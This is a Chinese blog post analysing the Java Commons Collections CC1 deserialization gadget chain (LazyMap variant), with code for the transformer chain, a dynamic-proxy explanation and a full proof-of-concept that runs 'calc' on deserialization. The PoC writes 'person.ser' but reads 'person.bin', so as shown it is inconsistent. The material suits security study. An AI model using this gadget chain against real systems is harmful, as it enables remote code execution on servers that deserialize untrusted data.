java cc链1 Lazymap

最新推荐文章于 2024-07-22 11:59:54 发布
最新推荐文章于 2024-07-22 11:59:54 发布
阅读量396 收藏 10
点赞数 5
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/135459826
版权

java cc链1 Lazymap
这条链和cc链1都是利用InvokerTransformer.transform,后续的调用方法不同,这里,一个通过TransformedMap的cheakvalue方法,这个则是利用Lazymap的get方法
不同点
TransformedMap

Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",
                    new Class[]{String.class, Class[].class},
                    new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke",
                    new Class[]{Object.class, Object[].class},
                    new Object[]{null, null}),
            new InvokerTransformer("exec",
                    new Class[]{String.class},
                    new String[]{"Calc.exe"}),
    };

    Transformer transformerChain = new ChainedTransformer(transformers);
    Map innerMap = new HashMap();
    Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
    outerMap.put("test", "666");

LazyMap

Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new String[]{"calc"}),
        };
        ChainedTransformer chainedTransformer= new ChainedTransformer(transformers);
        HashMap<Object,Object> map=new HashMap<>();
        Map<Object,Object> transformedmap= LazyMap.decorate(map,chainedTransformer);
        transformedmap.get("test");

这两个的调用方法很类似,只不过TransformedMap.put-->transformValue,LazyMap.get(仅在当前代码范围内),均可以正常进行命令执行,
AnnotationInvocationHandler中的invoke方法中存在

 Object result = memberValues.get(member);

这里的TransformedMap是可以控制的,这里使用动态代理的方式进行利用,这里贴一下简单的动态代理实现代码

import java.lang.reflect.InvocationHandler;  
import java.lang.reflect.Method;  
import java.lang.reflect.Proxy;  
  
interface MyInterface {  
    void doSomething();  
}  
  
class MyInterfaceImpl implements MyInterface {  
    public void doSomething() {  
        System.out.println("Doing something...");  
    }  
}  
  
class MyInvocationHandler implements InvocationHandler {  
    private Object target;  
  
    public MyInvocationHandler(Object target) {  
        this.target = target;  
    }  
  
    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {  
        System.out.println("Before method call...");  
        Object result = method.invoke(target, args);  
        System.out.println("After method call...");  
        return result;  
    }  
}  
  
public class DynamicProxyExample {  
    public static void main(String[] args) {  
        MyInterfaceImpl myObj = new MyInterfaceImpl();  
        MyInterface proxyObj = (MyInterface) Proxy.newProxyInstance(  
                MyInterfaceImpl.class.getClassLoader(),  
                myObj.getClass().getInterfaces(), 
                new MyInvocationHandler(myObj));  
        proxyObj.doSomething();  
    }  
}

doSomething()被调用时,MyInvocationHandler下面的invoke方法也会被执行,如果我们创建AnnotationInvocationHandler动态代理,如果外部方法执行,那么AnnotationInvocationHandler的invoke也会执行,那么这时候就需要外部方法调用,刚好在readObject中有个for循环中存在memberValues.entrySet()并且这里的memberValues参数可控,当我们传入的值为Map时,就是个标准的动态代理,memberValue.getKey()变为了Map.entrySet(),这里的invoke方法正常执行,并且还绕过了invoke方法的过滤,

if (member.equals("equals") && paramTypes.length == 1 &&
            paramTypes[0] == Object.class)
            return equalsImpl(args[0]);//是否调用equals方法
        if (paramTypes.length != 0)
            throw new AssertionError("Too many parameters for an annotation method");//是否为有参函数

 for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
        String name = memberValue.getKey();
        Class<?> memberType = memberTypes.get(name);
        if (memberType != null) {  // i.e. member still exists
            Object value = memberValue.getValue();
            if (!(memberType.isInstance(value) ||
                  value instanceof ExceptionProxy)) {
                memberValue.setValue(
                    new AnnotationTypeMismatchExceptionProxy(
                        value.getClass() + "[" + value + "]").setMember(
                            annotationType.members().get(name)));
            }
        }
    }

最后创建实例,利用readObject方法进行代码执行,最终的poc为

    public static void serialize(Object object) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("person.ser"));
        oos.writeObject(object);
    }

    
    public static void unserialize(String filename) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        objectInputStream.readObject();

    }
    public static void main(String[] args) throws Exception {
        org.apache.commons.collections.Transformer[] transformers = new Transformer[]{

                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new String[]{"calc"}),
        };
        ChainedTransformer chainedTransformer= new ChainedTransformer(transformers);
        HashMap<Object,Object> map=new HashMap<>();
        Map<Object,Object> lazymap= LazyMap.decorate(map,chainedTransformer);
//        transformedmap.get("test");
        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
        construct.setAccessible(true);
        InvocationHandler annotationInvocationHandler = (InvocationHandler) construct.newInstance(Override.class,lazymap);
        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), lazymap.getClass().getInterfaces(), annotationInvocationHandler);
        annotationInvocationHandler = (InvocationHandler) construct.newInstance(Override.class, proxyMap);
        serialize(annotationInvocationHandler);
        unserialize("person.bin");
    }

在这里,代理可以理解为通过AnnotationInvocationHandler调用Map中的方法,这里的Override.class表示注解,换成其他注解也可以。

天下是个小趴菜
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java安全 CC1分析(Lazymap类)
Elite的博客
02-11 1923
本文讲解了Java安全中如何使用LazyMap类来构造cc1,详细易懂,小白首选
Java反序列化之CC解析
defeed的博客
05-11 1258
一篇学习介绍javacc的文章,对cc的transform和简单的利用做了一些介绍
java反序列化及cc调用
keyfalg的博客
11-13 79
一文了解java反序列化和cc调用
CC1(LazyMap版)
..
10-14 625
前面我们介绍了TransformedMap版的CC1, 但是在ysoserial中用的是LazyMap,其实都差不多,下面开始分析一下,下面重在分析,如何找的就不说了(也不会)。如果文章有错误,欢迎斧正。
cc1(LazyMap)
qq_45766062的博客
08-19 317
代码】cc1(LazyMap)
CC1-LazyMap利用-源码分析
yuan_boss的博客
08-15 161
这个其实和我上一篇文章的CC1大致思路是一样的,主要特殊就在于利用了动态代理中自动调用InvocationHandler对象的invoke方法,从而调用到我们可以利用的get()方法。
CC1-LazyMap利用分析
07-02 652
分析下ysoserial中CC1的利用
cc1LazyMap
weixin_45682070的博客
01-09 919
前言 上一篇文章我们看了Java动态代理的概念,而cc1中的LazyMap就用到这个概念,现在来做个简单的剖析。 简而言之就是当调用到被代理对象的任何方法时,都会先调用InvocationHandler接口中的invoke方法,而AnnotationInvocationHandler正好实现了该接口。 LazyMap 首先我们先看一下代码: package org.example.cc; import org.apache.commons.collections.Transformer; import
JAVA SHA1加密-微信签名适用
08-15
Java中实现SHA1加密,是确保数据安全性和完整性的一个常见做法,尤其在与微信支付接口交互时,为了保证交易的安全,会要求使用SHA1进行签名。 SHA1全称为Secure Hash Algorithm 1,它是由美国国家安全局(NSA)...
java SHA1加密
07-23
简单的SHA1加密
java开源包1
06-28
用来计算 MD5、SHA 哈希算法的 Java 类库,支持 "MD5", "SHA", "SHA-1", "SHA-256", "SHA-384", "SHA-512". 高性能RPC框架 nfs-rpc nfs-rpc是一个集成了各种知名通信框架的高性能RPC框架,目前其最好的性能为在采用...
Java 面经手册·小傅哥.pdf
01-26
这是一本以面试题为入口讲解 Java 核心内容的技术...1. 具备一定编程基础,工作1-3年的研发人员 2. 想阅读 Java 核心源码,但总感觉看不懂的 3. 看了太多理论,但没有实践验证的 4. 求职面试,总被面试题搞的死去活来的
疯狂java讲义(第三版)光盘
04-16
本人前段时间在网上买的书,这是本书的随书光盘的百度云下载接,格式为iso,保证是第三版的原版光盘的完整内容。另外上传的一个已经不能用了,但是本人不知道怎么修改和删除,实在不好意思。
FairGuard游戏加固入选《嘶吼2024网络安全产业图谱》
FairGuard手游加固(企业官方博客)
07-19 423
FairGuard游戏加固作为游戏安全行业领先的第三方服务商,凭借技术创新、产品服务及市场反馈等多方面优异表现获得业界认可,实力入选移动应用安全细分领域。
【网络安全】CrowdStrike 的 Falcon Sensor 软件导致 Linux 内核崩溃
par@ish的博客
07-22 823
CrowdStrike的Falcon Sensor软件,上周导致大量Windows电脑出现蓝屏故障,现在还被发现Linux内核系统崩溃也与CrowdStrike有关。六月份,Red Hat警告其客户在使用版本为5.14.0-427.13.1.el9_4.x86_64的内核启动后,由Falcon Sensor进程引发的“Kernel panic”问题,影响了部分Red Hat Enterprise Linux 9.4用户。
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 608
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
网站验证:确保网络安全与信任的重要步骤
07-22 198
在数字时代,网站验证是确保网络安全和建立用户信任的关键措施。随着网络诈骗和恶意软件的日益增多,验证网站的真实性和安全性变得尤为重要。本文将探讨网站验证的重要性、常见的验证方法以及如何通过验证提升用户体验和网站信誉。
网络安全常见错误及解决办法(更新中)
最新发布
qq_42041946的博客
07-22 289
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
Java编程:深入理解责任模式
"Java模式开发之责任模式讨论了如何使用设计模式中的责任模式,通过击鼓传花的游戏场景进行生动的解释。责任模式是一种行为设计模式,用于将请求沿式结构传递,直到被某个处理者处理。在这个过程中,请求...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值